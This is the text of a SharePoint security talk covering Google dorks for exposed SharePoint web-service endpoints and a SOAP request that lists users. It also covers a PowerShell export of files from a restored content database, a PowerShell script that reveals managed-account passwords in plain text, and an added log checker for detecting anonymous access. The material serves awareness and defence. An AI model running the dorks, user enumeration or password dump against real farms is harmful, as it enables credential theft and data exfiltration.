SHAREPOINT HACKING, OR HOW TO GET AT SHAREPOINT DATA?
KAMIL JUŘÍK SHAREPOINT MVP, CTO ACCELAPPS
SHAREPOINT HACKING?
SharePoint vulnerabilities
SharePoint Google hacking
SharePoint Shodan
BLOB cache
SQL DB
SharePoint PowerShell Data Export
Site Collection Admin, Web Application Policy, Farm Admin
Who is your Farm Admin?
Slick third-party tools (Simego, AxioWorks)
SHAREPOINT VULNERABILITIES
https://www.cvedetails.com
SHAREPOINT PUBLIC SITES AND GOOGLE HACKING? OR FUN FOR FREE EVENINGS, OFTEN VERY INTERESTING READING!
    "all site content" site:.com filetype:aspx
    "/_vti_bin/lists.asmx" filetype:asmx
    "/_layouts/settings.aspx" filetype:aspx
    "/_vti_bin/permissions.asmx" filetype:asmx
    SharePoint "/_vti_bin/userprofileservice.asmx" filetype:asmx
    etc.
EXAMPLE: POST TO USERGROUP.ASMX
    POST /sites/web/_vti_bin/usergroup.asmx HTTP/1.1
    Host: host
    [ ]

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Body>
        <GetUserCollectionFromSite xmlns="http://schemas.microsoft.com/sharepoint/soap/directory/" />
      </soap:Body>
    </soap:Envelope>
Result:
SHAREPOINT AND SHODAN, OR FUN FOR FREE EVENINGS, OFTEN VERY INTERESTING READING!
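Added example, not part of the original slides: a defender-side check for the exposure that the Google hacking and usergroup.asmx slides rely on. It flags anonymous requests to those endpoints that IIS answered successfully. The log layout, sample lines, IP addresses, user name and the function name find_anonymous_hits are constructed for illustration.

```python
"""Flag anonymous, successful requests to the SharePoint endpoints from the slides."""

# Endpoints named on the slides, lower-cased because IIS paths are case-insensitive.
SENSITIVE_SUFFIXES = (
    "/_vti_bin/lists.asmx",
    "/_vti_bin/permissions.asmx",
    "/_vti_bin/usergroup.asmx",
    "/_vti_bin/userprofileservice.asmx",
    "/_layouts/settings.aspx",
)

# Constructed sample in IIS W3C extended format (documentation IP ranges).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2024-01-10 20:14:02 POST /sites/web/_vti_bin/usergroup.asmx - 198.51.100.7 200
2024-01-10 20:14:05 GET /sites/web/_layouts/settings.aspx - 198.51.100.7 401
2024-01-10 20:15:11 POST /sites/web/_vti_bin/Lists.asmx CONTOSO\\jnovak 192.0.2.15 200
2024-01-10 20:16:40 GET /sites/web/_vti_bin/UserProfileService.asmx - 198.51.100.7 200
2024-01-10 20:17:03 GET /sites/web/Pages/default.aspx - 198.51.100.9 200
"""

def find_anonymous_hits(log_text):
    """Return (timestamp, client_ip, method, path) for each anonymous 2xx hit."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]        # column order can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue                         # skip truncated or malformed rows
        row = dict(zip(fields, values))
        path = row.get("cs-uri-stem", "")
        anonymous = row.get("cs-username", "-") == "-"   # "-" means no authenticated user
        succeeded = row.get("sc-status", "").startswith("2")
        if anonymous and succeeded and path.lower().endswith(SENSITIVE_SUFFIXES):
            when = f"{row.get('date', '')} {row.get('time', '')}".strip()
            hits.append((when, row.get("c-ip"), row.get("cs-method"), path))
    return hits

if __name__ == "__main__":
    for hit in find_anonymous_hits(SAMPLE_LOG):
        print("anonymous access:", *hit)
```

Any hit means the web application answers unauthenticated callers on an administrative or directory endpoint, which is the condition to close off with anonymous-access settings or a reverse-proxy rule.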
SHAREPOINT BLOB CACHE
SharePoint web.config:
    <BlobCache location="c:\blobcache\14" path="\.(gif|jpg|jpeg|jpe|jfif|bmp|dib|tif|tiff|themedbmp|themedcss|themedgif|themedjpg|themedpng|ico|png|wdp|hdp|css|js|asf|avi|flv|m4v|mov|mp3|mp4|mpeg|mpg|rm|rmvb|wma|wmv|ogg|ogv|oga|webm|xap)$" maxsize="10" enabled="false" />
SHAREPOINT SQL DBs
Who has access to the databases in SQL? It is far from being just the SQL Admin.
If I take one of your SharePoint SQL Content DBs, what do I get?
How many content DBs do you have? One?
And where can I open such a DB?
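SHAREPOINT POWERSHELL DATA EXPORT
    # Open a restored copy of a content database without attaching it to the farm
    $db = Get-SPContentDatabase -ConnectAsUnattachedDatabase -DatabaseServer SHPDB -DatabaseName "SHP_PRD_Content_RestoredCopy"
    # Select the site collection by URL ($SiteURL is set elsewhere, not shown on the slide)
    $site = Get-SPSite -ContentDatabase $db | ? {$_.Url -eq $SiteURL}
    # $item is a list item from $site (its lookup is not shown on the slide); read the file as bytes
    $binary = $item.file.openbinary()
    # Write the bytes to disk ($SaveLocation and $DocName are set elsewhere)
    $stream = New-Object System.IO.FileStream(($SaveLocation + $DocName), [System.IO.FileMode]::Create)
    $writer = New-Object System.IO.BinaryWriter($stream)
    $writer.write($binary)
    $writer.close()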
SHAREPOINT AND ADMIN PERMISSIONS?
Farm Admins
Web Application users
Site Collection Admins
Site (web) permissions
SHAREPOINT AND PASSWORDS
    # Binding flags needed to read a private instance field via reflection
    function Bindings() {
        return [System.Reflection.BindingFlags]::CreateInstance -bor
            [System.Reflection.BindingFlags]::GetField -bor
            [System.Reflection.BindingFlags]::Instance -bor
            [System.Reflection.BindingFlags]::NonPublic
    }
    # Read the value of a non-public field from an object
    function GetFieldValue([object]$o, [string]$fieldname) {
        $bindings = Bindings
        return $o.gettype().getfield($fieldname, $bindings).getvalue($o);
    }
    # Convert a SecureString to plain text, then zero and free the unmanaged copy
    function ConvertTo-UnsecureString([System.Security.SecureString]$string) {
        $intptr = [System.IntPtr]::Zero
        $unmanagedstring = [System.Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode($string)
        $unsecurestring = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($unmanagedString)
        [System.Runtime.InteropServices.Marshal]::ZeroFreeGlobalAllocUnicode($unmanagedString)
        return $unsecurestring
    }
    # List each managed account with the password held in its private m_password field
    Get-SPManagedAccount | select UserName, @{Name="Password"; Expression={ConvertTo-UnsecureString (GetFieldValue $_ "m_password").securestringvalue}}
SHAREPOINT REPLICATION TO SQL
THANK YOU FOR YOUR ATTENTION
PLEASE ASK QUESTIONS